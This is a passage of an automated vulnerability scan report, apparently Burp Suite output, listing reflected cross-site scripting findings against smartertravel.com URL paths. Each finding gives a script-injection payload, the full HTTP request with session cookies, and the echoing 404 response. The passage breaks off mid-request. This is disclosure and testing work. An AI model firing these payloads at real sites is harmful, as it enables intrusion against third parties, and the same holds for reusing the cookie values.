<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/compare-prices/vacation-package8a8aa<script>alert(1)</script>2f1f8d351a6/</p>
...[SNIP]...

2.31. http://www.smartertravel.com/compare-prices/vacation-rentals/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/vacation-rentals/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ddf8<script>alert(1)</script>6857b916c30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /compare-prices2ddf8<script>alert(1)</script>6857b916c30/vacation-rentals/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:45:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:46:08 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:46:08 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:46:08 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/compare-prices2ddf8<script>alert(1)</script>6857b916c30/vacation-rentals/</p>
...[SNIP]...

2.32. http://www.smartertravel.com/compare-prices/vacation-rentals/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /compare-prices/vacation-rentals/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fbe79<script>alert(1)</script>bd213c3ef84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /compare-prices/vacation-rentalsfbe79<script>alert(1)</script>bd213c3ef84/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:46:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:47:04 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:47:04 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:47:04 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/compare-prices/vacation-rentalsfbe79<script>alert(1)</script>bd213c3ef84/</p>
...[SNIP]...

2.33. http://www.smartertravel.com/cruise/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /cruise/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 323db<script>alert(1)</script>5446e3a0bab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cruise323db<script>alert(1)</script>5446e3a0bab/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:13:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:14:24 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:14:24 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:14:24 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/cruise323db<script>alert(1)</script>5446e3a0bab/</p>
...[SNIP]...

2.34. http://www.smartertravel.com/deals/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /deals/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 832e6<script>alert(1)</script>ec91bb1cb3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /deals832e6<script>alert(1)</script>ec91bb1cb3c/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 23:43:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:44:14 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 13-Nov-2009 23:44:14 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 13-Nov-2009 23:44:14 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/deals832e6<script>alert(1)</script>ec91bb1cb3c/</p>
...[SNIP]...

2.35. http://www.smartertravel.com/family-travel/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /family-travel/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 37c1e<script>alert(1)</script>1741f77dfdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /family-travel37c1e<script>alert(1)</script>1741f77dfdb/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:04:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:04:30 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:04:30 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:04:30 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/family-travel37c1e<script>alert(1)</script>1741f77dfdb/</p>
...[SNIP]...

2.36. http://www.smartertravel.com/features/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /features/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 62ce4<script>alert(1)</script>5b084b343ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /features62ce4<script>alert(1)</script>5b084b343ad/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 01:55:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 01:55:50 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 01:55:50 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 01:55:50 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/features62ce4<script>alert(1)</script>5b084b343ad/</p>
...[SNIP]...

2.37. http://www.smartertravel.com/frequent-flyer/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /frequent-flyer/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2727<script>alert(1)</script>2504c36de7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /frequent-flyerb2727<script>alert(1)</script>2504c36de7b/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:08:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:08:30 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:08:30 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:08:30 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/frequent-flyerb2727<script>alert(1)</script>2504c36de7b/</p>
...[SNIP]...

2.38. http://www.smartertravel.com/guides/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /guides/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6b286<script>alert(1)</script>3eb5c21a323 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /guides6b286<script>alert(1)</script>3eb5c21a323/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 02:04:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:04:09 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 02:04:09 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 02:04:09 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/guides6b286<script>alert(1)</script>3eb5c21a323/</p>
...[SNIP]...

2.39. http://www.smartertravel.com/hotel/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /hotel/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c766f<script>alert(1)</script>a52bdc9ca85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotelc766f<script>alert(1)</script>a52bdc9ca85/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_p1_s_campaign=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; s_p1_s_eVar9=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; STMUL=deleted; at=deleted; entry_time=time; s_sq=%5B%5BB%5D%5D; iploc=Dallas, TX (DFW); s_p1_s_eVar7=kayak_Air_Smarter_Travel_All_Vacation_Ad_2; referrer=kayak_Air_Smarter_Travel_All_Vacation_Ad_2%3A%3A%3A%3A%3A%3A1289680935%3A%3A%3A; s_cc=true; o_prvchan=Compare+Prices+%7C+Vacation+Packages; bbSearches=%7B%22cs%22%3A%7B%22c1%22%3A%22HOU%22%2C%22c2%22%3A%22LAX%22%2C%22ntrv%22%3A%222%22%2C%22d1%22%3A1290664800000%2C%22d2%22%3A1291010400000%7D%2C%22rs%22%3A%7B%22air%22%3A%5B%5D%2C%22hotel%22%3A%5B%5D%2C%22car%22%3A%5B%5D%2C%22vacation%22%3A%5B%5D%2C%22vacation_rental%22%3A%5B%5D%2C%22cruise%22%3A%5B%5D%7D%7D; uu=d6c40be3-84da-4cc9-a10b-88cae49b52fa; STM=d28bbb71a2fabbbf65ecf154e557a7a146fac79699dd60429b912c31af91f8baf8d18d9591999eedcb99df6124593b82dbf052ff9876248d6338409a13832b6c; vid=4cdef8272bcc26.88831616;

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 00:28:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:28:12 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Sat, 14-Nov-2009 00:28:12 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Sat, 14-Nov-2009 00:28:12 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 27664

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
</strong> http://www.smartertravel.com/hotelc766f<script>alert(1)</script>a52bdc9ca85/</p>
...[SNIP]...

2.40. http://www.smartertravel.com/last-minute/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartertravel.com
Path:   /last-minute/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b9fe0<script>alert(1)</script>5edf07d0475 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /last-minuteb9fe0<script>alert(1)</script>5edf07d0475/ HTTP/1.1
Host: www.smartertravel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
